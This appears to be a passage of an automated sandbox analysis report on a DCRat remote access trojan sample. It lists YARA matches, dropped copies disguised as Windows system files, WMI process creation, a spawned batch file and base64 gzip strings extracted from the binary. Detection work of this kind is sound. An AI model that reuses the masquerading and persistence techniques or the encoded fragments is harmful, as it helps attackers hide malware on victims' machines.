                            Source: dmhu7oz5yP.exe, 00000000.00000002.1672344237.0000000002794000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: dmhu7oz5yP.exe, type: SAMPLEMatched rule: DCRat payload Author: ditekSHen
                            Source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Users\Default\RuntimeBroker.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\SoftwareDistribution\7bcc3440f42388Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exeJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Help\OEM\ContentStore\7bcc3440f42388Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exeJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Migration\WTR\7bcc3440f42388Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Media\WinStore.App.exeJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Media\WinStore.App.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Windows\Media\fd168b19609dffJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeCode function: 0_2_00007FFD9B8A0F880_2_00007FFD9B8A0F88
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeCode function: 0_2_00007FFD9B8B21F20_2_00007FFD9B8B21F2
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeCode function: 0_2_00007FFD9B8B061D0_2_00007FFD9B8B061D
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeCode function: 0_2_00007FFD9B8B0D9A0_2_00007FFD9B8B0D9A
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeCode function: 16_2_00007FFD9B88514116_2_00007FFD9B885141
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeCode function: 17_2_00007FFD9B890F8817_2_00007FFD9B890F88
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B89514119_2_00007FFD9B895141
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B8B0C6119_2_00007FFD9B8B0C61
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 19_2_00007FFD9B8BDCC819_2_00007FFD9B8BDCC8
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeCode function: 21_2_00007FFD9B88514121_2_00007FFD9B885141
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeCode function: 23_2_00007FFD9B880F8823_2_00007FFD9B880F88
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeCode function: 25_2_00007FFD9B8B0F8825_2_00007FFD9B8B0F88
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeCode function: 40_2_00007FFD9B88514140_2_00007FFD9B885141
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeCode function: 41_2_00007FFD9B89514141_2_00007FFD9B895141
                            Source: dmhu7oz5yP.exeStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: jnTUlYyDyuybgXdgxhTkT.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: WinStore.App.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: RuntimeBroker.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: RuntimeBroker.exe0.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: upfc.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: dmhu7oz5yP.exe, 00000000.00000002.1674023685.000000001B7D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs dmhu7oz5yP.exe
                            Source: dmhu7oz5yP.exe, 00000000.00000000.1640788306.0000000000302000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs dmhu7oz5yP.exe
                            Source: dmhu7oz5yP.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs dmhu7oz5yP.exe
                            Source: dmhu7oz5yP.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: dmhu7oz5yP.exe, type: SAMPLEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Users\Default\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: dmhu7oz5yP.exe, Q69.csCryptographic APIs: 'TransformBlock'
                            Source: dmhu7oz5yP.exe, Q69.csCryptographic APIs: 'TransformFinalBlock'
                            Source: dmhu7oz5yP.exe, Q69.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                            Source: WinStore.App.exe.0.dr, Q69.csCryptographic APIs: 'TransformBlock'
                            Source: WinStore.App.exe.0.dr, Q69.csCryptographic APIs: 'TransformFinalBlock'
                            Source: WinStore.App.exe.0.dr, Q69.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                            Source: RuntimeBroker.exe0.0.dr, Q69.csCryptographic APIs: 'TransformBlock'
                            Source: RuntimeBroker.exe0.0.dr, Q69.csCryptographic APIs: 'TransformFinalBlock'
                            Source: RuntimeBroker.exe0.0.dr, Q69.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                            Source: dmhu7oz5yP.exe, 277.csBase64 encoded string: 'H4sIAAAAAAAEAF2US3eiMBiGf9BsBMd2XHRh1SgZDQUlQHYStVwSpAfHC79+QnnpqV1wyMP7XZOPvLx4R8WWSSq0m3mBl103ormFsa5y543xT7bocv/k3INXOl1lg9KR/lCmYu6cJxt65wtRj7Xf0Eg0nNPsqtzsSnYDspAnpmXKbWl4pXgpByamHGvxT9lyxEycWx97GhU0ii90IaubHT/Y+8PkxMpEcS3zHz7pbZFUVSRqpcWjj5YXZsvK1w/2ZxKKwY8YZ6JlyReJ8rvvfe9SlfJi+qzSxxg5e+TGMrnEj29t/v1QNmYPHupikajOdnJBjK9cZLFP/fAweI0SpZZJTcLdwOzH1fR8GdmiotOoDmxZEy3a+OoW7rSpuRyFu2bc+kZxwUqp2HB/oWWsRBQ3xueZZm4mC3/WneP6yckCTgqnnuRutra8qTnP+yl3Asa3W7O2PtdW8H0GlnTuf2fmE3/dzkEReffU3kb+kFVs5gaq2K9pvpmnip3fuR9wvj1Sy5u3NYCza+ZkJseSzHm7Hpsaz6aftqe67dG8n8EVWIHn4F/gK/gd/Btcg3PwR28PLQUr6CdwBi7AY9i/045j6Br6CHyArsETMANXsP8A/wH7fT+wH/Y62Eb+I5hCz+G/7c/XU8HsVTm1szmafw//Hw/auTPPG/gAjju29h1bUceKd6xW4DXsj+ANdDBJoP8Fw57Dn/T5+/tAgKFzF/ldcAitrxf5iNffJ4iPfAr2X/eNRDwH/m/wB1uoT8Gfo1/e66hXYT+ImVXr0M5qYGZ4S++H//LoXmkoBQAA', 'H4sIAAAAAAAEAFNWVkvLdMyyM7Nzjs9MyLTTCsoOMqyrS3VWzbbOMwzRddRR1CzVyY1TLcm1rovPi1NQUUhSNdSLK8t3SdYI8kjMzM+ys0nPtisG6nfV1FLRVM1T867R09TRcFEr08pNKjNVTCyqCdc0NLVRUdAJTyzRsYkzc/RQ0XDIBdqp6GtXY5MKAMqDLTaEAAAA'
                            Source: dmhu7oz5yP.exe, kJk.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                            Source: dmhu7oz5yP.exe, Ba5.csBase64 encoded string: 'H4sIAAAAAAAEAFNRsYmz1lJ1UNDRja+JV3awrlNO0LDTjK+LV1MEAHr/mQocAAAA'
                            Source: WinStore.App.exe.0.dr, 277.csBase64 encoded string: 'H4sIAAAAAAAEAF2US3eiMBiGf9BsBMd2XHRh1SgZDQUlQHYStVwSpAfHC79+QnnpqV1wyMP7XZOPvLx4R8WWSSq0m3mBl103ormFsa5y543xT7bocv/k3INXOl1lg9KR/lCmYu6cJxt65wtRj7Xf0Eg0nNPsqtzsSnYDspAnpmXKbWl4pXgpByamHGvxT9lyxEycWx97GhU0ii90IaubHT/Y+8PkxMpEcS3zHz7pbZFUVSRqpcWjj5YXZsvK1w/2ZxKKwY8YZ6JlyReJ8rvvfe9SlfJi+qzSxxg5e+TGMrnEj29t/v1QNmYPHupikajOdnJBjK9cZLFP/fAweI0SpZZJTcLdwOzH1fR8GdmiotOoDmxZEy3a+OoW7rSpuRyFu2bc+kZxwUqp2HB/oWWsRBQ3xueZZm4mC3/WneP6yckCTgqnnuRutra8qTnP+yl3Asa3W7O2PtdW8H0GlnTuf2fmE3/dzkEReffU3kb+kFVs5gaq2K9pvpmnip3fuR9wvj1Sy5u3NYCza+ZkJseSzHm7Hpsaz6aftqe67dG8n8EVWIHn4F/gK/gd/Btcg3PwR28PLQUr6CdwBi7AY9i/045j6Br6CHyArsETMANXsP8A/wH7fT+wH/Y62Eb+I5hCz+G/7c/XU8HsVTm1szmafw//Hw/auTPPG/gAjju29h1bUceKd6xW4DXsj+ANdDBJoP8Fw57Dn/T5+/tAgKFzF/ldcAitrxf5iNffJ4iPfAr2X/eNRDwH/m/wB1uoT8Gfo1/e66hXYT+ImVXr0M5qYGZ4S++H//LoXmkoBQAA', 'H4sIAAAAAAAEAFNWVkvLdMyyM7Nzjs9MyLTTCsoOMqyrS3VWzbbOMwzRddRR1CzVyY1TLcm1rovPi1NQUUhSNdSLK8t3SdYI8kjMzM+ys0nPtisG6nfV1FLRVM1T867R09TRcFEr08pNKjNVTCyqCdc0NLVRUdAJTyzRsYkzc/RQ0XDIBdqp6GtXY5MKAMqDLTaEAAAA'
                            Source: WinStore.App.exe.0.dr, kJk.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                            Source: WinStore.App.exe.0.dr, Ba5.csBase64 encoded string: 'H4sIAAAAAAAEAFNRsYmz1lJ1UNDRja+JV3awrlNO0LDTjK+LV1MEAHr/mQocAAAA'
                            Source: RuntimeBroker.exe0.0.dr, 277.csBase64 encoded string: 'H4sIAAAAAAAEAF2US3eiMBiGf9BsBMd2XHRh1SgZDQUlQHYStVwSpAfHC79+QnnpqV1wyMP7XZOPvLx4R8WWSSq0m3mBl103ormFsa5y543xT7bocv/k3INXOl1lg9KR/lCmYu6cJxt65wtRj7Xf0Eg0nNPsqtzsSnYDspAnpmXKbWl4pXgpByamHGvxT9lyxEycWx97GhU0ii90IaubHT/Y+8PkxMpEcS3zHz7pbZFUVSRqpcWjj5YXZsvK1w/2ZxKKwY8YZ6JlyReJ8rvvfe9SlfJi+qzSxxg5e+TGMrnEj29t/v1QNmYPHupikajOdnJBjK9cZLFP/fAweI0SpZZJTcLdwOzH1fR8GdmiotOoDmxZEy3a+OoW7rSpuRyFu2bc+kZxwUqp2HB/oWWsRBQ3xueZZm4mC3/WneP6yckCTgqnnuRutra8qTnP+yl3Asa3W7O2PtdW8H0GlnTuf2fmE3/dzkEReffU3kb+kFVs5gaq2K9pvpmnip3fuR9wvj1Sy5u3NYCza+ZkJseSzHm7Hpsaz6aftqe67dG8n8EVWIHn4F/gK/gd/Btcg3PwR28PLQUr6CdwBi7AY9i/045j6Br6CHyArsETMANXsP8A/wH7fT+wH/Y62Eb+I5hCz+G/7c/XU8HsVTm1szmafw//Hw/auTPPG/gAjju29h1bUceKd6xW4DXsj+ANdDBJoP8Fw57Dn/T5+/tAgKFzF/ldcAitrxf5iNffJ4iPfAr2X/eNRDwH/m/wB1uoT8Gfo1/e66hXYT+ImVXr0M5qYGZ4S++H//LoXmkoBQAA', 'H4sIAAAAAAAEAFNWVkvLdMyyM7Nzjs9MyLTTCsoOMqyrS3VWzbbOMwzRddRR1CzVyY1TLcm1rovPi1NQUUhSNdSLK8t3SdYI8kjMzM+ys0nPtisG6nfV1FLRVM1T867R09TRcFEr08pNKjNVTCyqCdc0NLVRUdAJTyzRsYkzc/RQ0XDIBdqp6GtXY5MKAMqDLTaEAAAA'
                            Source: RuntimeBroker.exe0.0.dr, kJk.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                            Source: RuntimeBroker.exe0.0.dr, Ba5.csBase64 encoded string: 'H4sIAAAAAAAEAFNRsYmz1lJ1UNDRja+JV3awrlNO0LDTjK+LV1MEAHr/mQocAAAA'
                            Source: upfc.exe.0.dr, 277.csBase64 encoded string: 'H4sIAAAAAAAEAF2US3eiMBiGf9BsBMd2XHRh1SgZDQUlQHYStVwSpAfHC79+QnnpqV1wyMP7XZOPvLx4R8WWSSq0m3mBl103ormFsa5y543xT7bocv/k3INXOl1lg9KR/lCmYu6cJxt65wtRj7Xf0Eg0nNPsqtzsSnYDspAnpmXKbWl4pXgpByamHGvxT9lyxEycWx97GhU0ii90IaubHT/Y+8PkxMpEcS3zHz7pbZFUVSRqpcWjj5YXZsvK1w/2ZxKKwY8YZ6JlyReJ8rvvfe9SlfJi+qzSxxg5e+TGMrnEj29t/v1QNmYPHupikajOdnJBjK9cZLFP/fAweI0SpZZJTcLdwOzH1fR8GdmiotOoDmxZEy3a+OoW7rSpuRyFu2bc+kZxwUqp2HB/oWWsRBQ3xueZZm4mC3/WneP6yckCTgqnnuRutra8qTnP+yl3Asa3W7O2PtdW8H0GlnTuf2fmE3/dzkEReffU3kb+kFVs5gaq2K9pvpmnip3fuR9wvj1Sy5u3NYCza+ZkJseSzHm7Hpsaz6aftqe67dG8n8EVWIHn4F/gK/gd/Btcg3PwR28PLQUr6CdwBi7AY9i/045j6Br6CHyArsETMANXsP8A/wH7fT+wH/Y62Eb+I5hCz+G/7c/XU8HsVTm1szmafw//Hw/auTPPG/gAjju29h1bUceKd6xW4DXsj+ANdDBJoP8Fw57Dn/T5+/tAgKFzF/ldcAitrxf5iNffJ4iPfAr2X/eNRDwH/m/wB1uoT8Gfo1/e66hXYT+ImVXr0M5qYGZ4S++H//LoXmkoBQAA', 'H4sIAAAAAAAEAFNWVkvLdMyyM7Nzjs9MyLTTCsoOMqyrS3VWzbbOMwzRddRR1CzVyY1TLcm1rovPi1NQUUhSNdSLK8t3SdYI8kjMzM+ys0nPtisG6nfV1FLRVM1T867R09TRcFEr08pNKjNVTCyqCdc0NLVRUdAJTyzRsYkzc/RQ0XDIBdqp6GtXY5MKAMqDLTaEAAAA'
                            Source: upfc.exe.0.dr, kJk.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                            Source: upfc.exe.0.dr, Ba5.csBase64 encoded string: 'H4sIAAAAAAAEAFNRsYmz1lJ1UNDRja+JV3awrlNO0LDTjK+LV1MEAHr/mQocAAAA'
                            Source: RuntimeBroker.exe0.0.dr, x6e.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: RuntimeBroker.exe0.0.dr, x6e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: dmhu7oz5yP.exe, x6e.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: dmhu7oz5yP.exe, x6e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: upfc.exe.0.dr, x6e.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: upfc.exe.0.dr, x6e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: WinStore.App.exe.0.dr, x6e.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: WinStore.App.exe.0.dr, x6e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@45/35@1/1
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Users\Default User\RuntimeBroker.exeJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeMutant created: \Sessions\1\BaseNamedObjects\Local\608f26fd9e29f1ff73c212518da1477c6985de50
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile created: C:\Users\user\AppData\Local\Temp\YswW7DcfvgJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                            Source: dmhu7oz5yP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: dmhu7oz5yP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
